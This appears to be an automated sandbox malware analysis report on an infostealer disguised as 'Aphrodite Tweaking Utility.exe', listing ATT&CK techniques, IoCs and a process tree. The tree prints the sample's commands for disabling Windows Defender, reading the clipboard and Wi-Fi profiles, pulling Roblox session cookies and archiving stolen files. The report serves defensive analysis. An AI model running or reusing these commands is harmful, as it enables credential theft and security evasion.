3aa6ab768e83c7c2e638c8ebe26be86c49a85b7f7445fc0e0948ef44db7ae812

Analysis

max time kernel
96s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
23-12-2024 19:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Aphrodite Tweaking Utility.exe
Size

8.6MB
MD5

b5036c5763c816a3f39153a288f375e1
SHA1

47bd6d3eb43d0ec19ff80b56bd41314becc5347f
SHA256

3aa6ab768e83c7c2e638c8ebe26be86c49a85b7f7445fc0e0948ef44db7ae812
SHA512

00bc737089b0eeaf7ac5b2a1f7265e230f49009d241b8f597913b020a1a1197818e11707e19871f5099a3c6defd738fb92d10038f6a05b9b1181bc108537c479
SSDEEP

196608:Bg8PRLrVdfsjLjv+bhqNVoB0SEsucQZ41JBbIEs1Lp:28PLKL+9qz80SJHQK1J9shp

Score

8^/10

collection credential_access discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3964	powershell.exe
4660	powershell.exe
3452	powershell.exe
4932	powershell.exe
972	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Aphrodite Tweaking Utility.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4644	cmd.exe
3488	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
3468	bound.exe
3420	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3780	Aphrodite Tweaking Utility.exe
3780	Aphrodite Tweaking Utility.exe
3780	Aphrodite Tweaking Utility.exe
3780	Aphrodite Tweaking Utility.exe
3780	Aphrodite Tweaking Utility.exe
3780	Aphrodite Tweaking Utility.exe
3780	Aphrodite Tweaking Utility.exe
3780	Aphrodite Tweaking Utility.exe
3780	Aphrodite Tweaking Utility.exe
3780	Aphrodite Tweaking Utility.exe
3780	Aphrodite Tweaking Utility.exe
3780	Aphrodite Tweaking Utility.exe
3780	Aphrodite Tweaking Utility.exe
3780	Aphrodite Tweaking Utility.exe
3780	Aphrodite Tweaking Utility.exe
3780	Aphrodite Tweaking Utility.exe
3780	Aphrodite Tweaking Utility.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
20	discord.com
21	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
1312	tasklist.exe
4340	tasklist.exe
8	tasklist.exe
676	tasklist.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023cb2-22.dat	upx
behavioral2/memory/3780-26-0x00007FFAC2590000-0x00007FFAC2B7E000-memory.dmp	upx
behavioral2/files/0x0007000000023ca4-28.dat	upx
behavioral2/files/0x0007000000023cb0-30.dat	upx
behavioral2/memory/3780-50-0x00007FFADB1C0000-0x00007FFADB1CF000-memory.dmp	upx
behavioral2/memory/3780-49-0x00007FFAD6D70000-0x00007FFAD6D94000-memory.dmp	upx
behavioral2/files/0x0007000000023caa-47.dat	upx
behavioral2/files/0x0007000000023ca9-46.dat	upx
behavioral2/files/0x0007000000023ca8-45.dat	upx
behavioral2/files/0x0007000000023ca7-44.dat	upx
behavioral2/files/0x0007000000023ca6-43.dat	upx
behavioral2/files/0x0007000000023ca5-42.dat	upx
behavioral2/files/0x0007000000023ca3-41.dat	upx
behavioral2/files/0x0007000000023cb7-40.dat	upx
behavioral2/files/0x0007000000023cb6-39.dat	upx
behavioral2/files/0x0007000000023cb5-38.dat	upx
behavioral2/files/0x0007000000023cb1-35.dat	upx
behavioral2/files/0x0007000000023caf-34.dat	upx
behavioral2/files/0x0007000000023cab-48.dat	upx
behavioral2/memory/3780-56-0x00007FFAC8DD0000-0x00007FFAC8DFD000-memory.dmp	upx
behavioral2/memory/3780-58-0x00007FFAD14F0000-0x00007FFAD1509000-memory.dmp	upx
behavioral2/memory/3780-60-0x00007FFAC8DA0000-0x00007FFAC8DC3000-memory.dmp	upx
behavioral2/memory/3780-62-0x00007FFAC1C00000-0x00007FFAC1D76000-memory.dmp	upx
behavioral2/memory/3780-64-0x00007FFAD8860000-0x00007FFAD8879000-memory.dmp	upx
behavioral2/memory/3780-66-0x00007FFAD1DC0000-0x00007FFAD1DCD000-memory.dmp	upx
behavioral2/memory/3780-69-0x00007FFAD1D80000-0x00007FFAD1DB3000-memory.dmp	upx
behavioral2/memory/3780-68-0x00007FFAC2590000-0x00007FFAC2B7E000-memory.dmp	upx
behavioral2/memory/3780-73-0x00007FFAC24C0000-0x00007FFAC258D000-memory.dmp	upx
behavioral2/memory/3780-76-0x00007FFAD6D70000-0x00007FFAD6D94000-memory.dmp	upx
behavioral2/memory/3780-74-0x00007FFAC16D0000-0x00007FFAC1BF2000-memory.dmp	upx
behavioral2/memory/3780-78-0x00007FFAD2270000-0x00007FFAD2284000-memory.dmp	upx
behavioral2/memory/3780-80-0x00007FFAD2260000-0x00007FFAD226D000-memory.dmp	upx
behavioral2/memory/3780-83-0x00007FFAD14F0000-0x00007FFAD1509000-memory.dmp	upx
behavioral2/memory/3780-84-0x00007FFAC23A0000-0x00007FFAC24BC000-memory.dmp	upx
behavioral2/memory/3780-163-0x00007FFAC8DA0000-0x00007FFAC8DC3000-memory.dmp	upx
behavioral2/memory/3780-190-0x00007FFAC1C00000-0x00007FFAC1D76000-memory.dmp	upx
behavioral2/memory/3780-235-0x00007FFAD8860000-0x00007FFAD8879000-memory.dmp	upx
behavioral2/memory/3780-261-0x00007FFAD1D80000-0x00007FFAD1DB3000-memory.dmp	upx
behavioral2/memory/3780-269-0x00007FFAC16D0000-0x00007FFAC1BF2000-memory.dmp	upx
behavioral2/memory/3780-268-0x00007FFAC24C0000-0x00007FFAC258D000-memory.dmp	upx
behavioral2/memory/3780-292-0x00007FFAD6D70000-0x00007FFAD6D94000-memory.dmp	upx
behavioral2/memory/3780-297-0x00007FFAC1C00000-0x00007FFAC1D76000-memory.dmp	upx
behavioral2/memory/3780-291-0x00007FFAC2590000-0x00007FFAC2B7E000-memory.dmp	upx
behavioral2/memory/3780-317-0x00007FFAC16D0000-0x00007FFAC1BF2000-memory.dmp	upx
behavioral2/memory/3780-331-0x00007FFAC24C0000-0x00007FFAC258D000-memory.dmp	upx
behavioral2/memory/3780-330-0x00007FFAD1D80000-0x00007FFAD1DB3000-memory.dmp	upx
behavioral2/memory/3780-329-0x00007FFAD1DC0000-0x00007FFAD1DCD000-memory.dmp	upx
behavioral2/memory/3780-328-0x00007FFAD8860000-0x00007FFAD8879000-memory.dmp	upx
behavioral2/memory/3780-327-0x00007FFAC1C00000-0x00007FFAC1D76000-memory.dmp	upx
behavioral2/memory/3780-326-0x00007FFAC8DA0000-0x00007FFAC8DC3000-memory.dmp	upx
behavioral2/memory/3780-325-0x00007FFAD14F0000-0x00007FFAD1509000-memory.dmp	upx
behavioral2/memory/3780-324-0x00007FFAC8DD0000-0x00007FFAC8DFD000-memory.dmp	upx
behavioral2/memory/3780-323-0x00007FFAC2590000-0x00007FFAC2B7E000-memory.dmp	upx
behavioral2/memory/3780-322-0x00007FFAD6D70000-0x00007FFAD6D94000-memory.dmp	upx
behavioral2/memory/3780-321-0x00007FFADB1C0000-0x00007FFADB1CF000-memory.dmp	upx
behavioral2/memory/3780-319-0x00007FFAD2260000-0x00007FFAD226D000-memory.dmp	upx
behavioral2/memory/3780-318-0x00007FFAD2270000-0x00007FFAD2284000-memory.dmp	upx
behavioral2/memory/3780-320-0x00007FFAC23A0000-0x00007FFAC24BC000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3420	netsh.exe
3124	cmd.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3216	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3024	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

pid	Process
4660	powershell.exe
4932	powershell.exe
972	powershell.exe
972	powershell.exe
4932	powershell.exe
4932	powershell.exe
4660	powershell.exe
4660	powershell.exe
3488	powershell.exe
3488	powershell.exe
3488	powershell.exe
3452	powershell.exe
3452	powershell.exe
2956	powershell.exe
2956	powershell.exe
3964	powershell.exe
3964	powershell.exe
3664	powershell.exe
3664	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4660	powershell.exe
Token: SeDebugPrivilege	4932	powershell.exe
Token: SeDebugPrivilege	3468	bound.exe
Token: SeDebugPrivilege	972	powershell.exe
Token: SeDebugPrivilege	1312	tasklist.exe
Token: SeDebugPrivilege	4340	tasklist.exe
Token: SeDebugPrivilege	3488	powershell.exe
Token: SeIncreaseQuotaPrivilege	816	WMIC.exe
Token: SeSecurityPrivilege	816	WMIC.exe
Token: SeTakeOwnershipPrivilege	816	WMIC.exe
Token: SeLoadDriverPrivilege	816	WMIC.exe
Token: SeSystemProfilePrivilege	816	WMIC.exe
Token: SeSystemtimePrivilege	816	WMIC.exe
Token: SeProfSingleProcessPrivilege	816	WMIC.exe
Token: SeIncBasePriorityPrivilege	816	WMIC.exe
Token: SeCreatePagefilePrivilege	816	WMIC.exe
Token: SeBackupPrivilege	816	WMIC.exe
Token: SeRestorePrivilege	816	WMIC.exe
Token: SeShutdownPrivilege	816	WMIC.exe
Token: SeDebugPrivilege	816	WMIC.exe
Token: SeSystemEnvironmentPrivilege	816	WMIC.exe
Token: SeRemoteShutdownPrivilege	816	WMIC.exe
Token: SeUndockPrivilege	816	WMIC.exe
Token: SeManageVolumePrivilege	816	WMIC.exe
Token: 33	816	WMIC.exe
Token: 34	816	WMIC.exe
Token: 35	816	WMIC.exe
Token: 36	816	WMIC.exe
Token: SeIncreaseQuotaPrivilege	816	WMIC.exe
Token: SeSecurityPrivilege	816	WMIC.exe
Token: SeTakeOwnershipPrivilege	816	WMIC.exe
Token: SeLoadDriverPrivilege	816	WMIC.exe
Token: SeSystemProfilePrivilege	816	WMIC.exe
Token: SeSystemtimePrivilege	816	WMIC.exe
Token: SeProfSingleProcessPrivilege	816	WMIC.exe
Token: SeIncBasePriorityPrivilege	816	WMIC.exe
Token: SeCreatePagefilePrivilege	816	WMIC.exe
Token: SeBackupPrivilege	816	WMIC.exe
Token: SeRestorePrivilege	816	WMIC.exe
Token: SeShutdownPrivilege	816	WMIC.exe
Token: SeDebugPrivilege	816	WMIC.exe
Token: SeSystemEnvironmentPrivilege	816	WMIC.exe
Token: SeRemoteShutdownPrivilege	816	WMIC.exe
Token: SeUndockPrivilege	816	WMIC.exe
Token: SeManageVolumePrivilege	816	WMIC.exe
Token: 33	816	WMIC.exe
Token: 34	816	WMIC.exe
Token: 35	816	WMIC.exe
Token: 36	816	WMIC.exe
Token: SeDebugPrivilege	8	tasklist.exe
Token: SeDebugPrivilege	676	tasklist.exe
Token: SeDebugPrivilege	3452	powershell.exe
Token: SeDebugPrivilege	2956	powershell.exe
Token: SeIncreaseQuotaPrivilege	556	WMIC.exe
Token: SeSecurityPrivilege	556	WMIC.exe
Token: SeTakeOwnershipPrivilege	556	WMIC.exe
Token: SeLoadDriverPrivilege	556	WMIC.exe
Token: SeSystemProfilePrivilege	556	WMIC.exe
Token: SeSystemtimePrivilege	556	WMIC.exe
Token: SeProfSingleProcessPrivilege	556	WMIC.exe
Token: SeIncBasePriorityPrivilege	556	WMIC.exe
Token: SeCreatePagefilePrivilege	556	WMIC.exe
Token: SeBackupPrivilege	556	WMIC.exe
Token: SeRestorePrivilege	556	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4272 wrote to memory of 3780	4272	Aphrodite Tweaking Utility.exe	84
PID 4272 wrote to memory of 3780	4272	Aphrodite Tweaking Utility.exe	84
PID 3780 wrote to memory of 1092	3780	Aphrodite Tweaking Utility.exe	85
PID 3780 wrote to memory of 1092	3780	Aphrodite Tweaking Utility.exe	85
PID 3780 wrote to memory of 1076	3780	Aphrodite Tweaking Utility.exe	86
PID 3780 wrote to memory of 1076	3780	Aphrodite Tweaking Utility.exe	86
PID 3780 wrote to memory of 4784	3780	Aphrodite Tweaking Utility.exe	89
PID 3780 wrote to memory of 4784	3780	Aphrodite Tweaking Utility.exe	89
PID 3780 wrote to memory of 2724	3780	Aphrodite Tweaking Utility.exe	90
PID 3780 wrote to memory of 2724	3780	Aphrodite Tweaking Utility.exe	90
PID 1076 wrote to memory of 4660	1076	cmd.exe	93
PID 1076 wrote to memory of 4660	1076	cmd.exe	93
PID 1092 wrote to memory of 4932	1092	cmd.exe	94
PID 1092 wrote to memory of 4932	1092	cmd.exe	94
PID 4784 wrote to memory of 972	4784	cmd.exe	96
PID 4784 wrote to memory of 972	4784	cmd.exe	96
PID 2724 wrote to memory of 3468	2724	cmd.exe	95
PID 2724 wrote to memory of 3468	2724	cmd.exe	95
PID 3780 wrote to memory of 2924	3780	Aphrodite Tweaking Utility.exe	97
PID 3780 wrote to memory of 2924	3780	Aphrodite Tweaking Utility.exe	97
PID 3780 wrote to memory of 548	3780	Aphrodite Tweaking Utility.exe	98
PID 3780 wrote to memory of 548	3780	Aphrodite Tweaking Utility.exe	98
PID 2924 wrote to memory of 1312	2924	cmd.exe	101
PID 2924 wrote to memory of 1312	2924	cmd.exe	101
PID 548 wrote to memory of 4340	548	cmd.exe	102
PID 548 wrote to memory of 4340	548	cmd.exe	102
PID 3780 wrote to memory of 436	3780	Aphrodite Tweaking Utility.exe	149
PID 3780 wrote to memory of 436	3780	Aphrodite Tweaking Utility.exe	149
PID 3780 wrote to memory of 4644	3780	Aphrodite Tweaking Utility.exe	104
PID 3780 wrote to memory of 4644	3780	Aphrodite Tweaking Utility.exe	104
PID 3780 wrote to memory of 1816	3780	Aphrodite Tweaking Utility.exe	145
PID 3780 wrote to memory of 1816	3780	Aphrodite Tweaking Utility.exe	145
PID 3780 wrote to memory of 2696	3780	Aphrodite Tweaking Utility.exe	108
PID 3780 wrote to memory of 2696	3780	Aphrodite Tweaking Utility.exe	108
PID 3780 wrote to memory of 3124	3780	Aphrodite Tweaking Utility.exe	109
PID 3780 wrote to memory of 3124	3780	Aphrodite Tweaking Utility.exe	109
PID 3780 wrote to memory of 3624	3780	Aphrodite Tweaking Utility.exe	114
PID 3780 wrote to memory of 3624	3780	Aphrodite Tweaking Utility.exe	114
PID 3780 wrote to memory of 2808	3780	Aphrodite Tweaking Utility.exe	111
PID 3780 wrote to memory of 2808	3780	Aphrodite Tweaking Utility.exe	111
PID 4644 wrote to memory of 3488	4644	cmd.exe	118
PID 4644 wrote to memory of 3488	4644	cmd.exe	118
PID 436 wrote to memory of 816	436	cmd.exe	119
PID 436 wrote to memory of 816	436	cmd.exe	119
PID 1816 wrote to memory of 3856	1816	cmd.exe	120
PID 1816 wrote to memory of 3856	1816	cmd.exe	120
PID 2696 wrote to memory of 8	2696	cmd.exe	121
PID 2696 wrote to memory of 8	2696	cmd.exe	121
PID 3124 wrote to memory of 3420	3124	cmd.exe	122
PID 3124 wrote to memory of 3420	3124	cmd.exe	122
PID 2808 wrote to memory of 3024	2808	cmd.exe	123
PID 2808 wrote to memory of 3024	2808	cmd.exe	123
PID 3624 wrote to memory of 4828	3624	cmd.exe	124
PID 3624 wrote to memory of 4828	3624	cmd.exe	124
PID 3780 wrote to memory of 3620	3780	Aphrodite Tweaking Utility.exe	125
PID 3780 wrote to memory of 3620	3780	Aphrodite Tweaking Utility.exe	125
PID 3780 wrote to memory of 4520	3780	Aphrodite Tweaking Utility.exe	127
PID 3780 wrote to memory of 4520	3780	Aphrodite Tweaking Utility.exe	127
PID 3620 wrote to memory of 3544	3620	cmd.exe	129
PID 3620 wrote to memory of 3544	3620	cmd.exe	129
PID 3780 wrote to memory of 4884	3780	Aphrodite Tweaking Utility.exe	130
PID 3780 wrote to memory of 4884	3780	Aphrodite Tweaking Utility.exe	130
PID 4520 wrote to memory of 2272	4520	cmd.exe	132
PID 4520 wrote to memory of 2272	4520	cmd.exe	132

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2272	attrib.exe
1920	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Aphrodite Tweaking Utility.exe
"C:\Users\Admin\AppData\Local\Temp\Aphrodite Tweaking Utility.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4272
- C:\Users\Admin\AppData\Local\Temp\Aphrodite Tweaking Utility.exe
  "C:\Users\Admin\AppData\Local\Temp\Aphrodite Tweaking Utility.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aphrodite Tweaking Utility.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1092
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aphrodite Tweaking Utility.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1076
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4784
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2724
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2924
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:548
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:436
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4644
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1816
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2696
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:8
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:3124
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2808
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3624
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3620
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4520
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4884
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2600
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3940
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3612
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1404
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4440
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:436
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1920
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:4308
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:1396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI42722\rar.exe a -r -hp"opex123" "C:\Users\Admin\AppData\Local\Temp\sJB9y.zip" *"
    3⤵
    PID:4460
  - - C:\Users\Admin\AppData\Local\Temp\_MEI42722\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI42722\rar.exe a -r -hp"opex123" "C:\Users\Admin\AppData\Local\Temp\sJB9y.zip" *
      4⤵
      Executes dropped EXE
      PID:3420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4284
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:972
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4788
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:4932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4744
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1460
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3216
- - C:\Windows\system32\cmd.exe
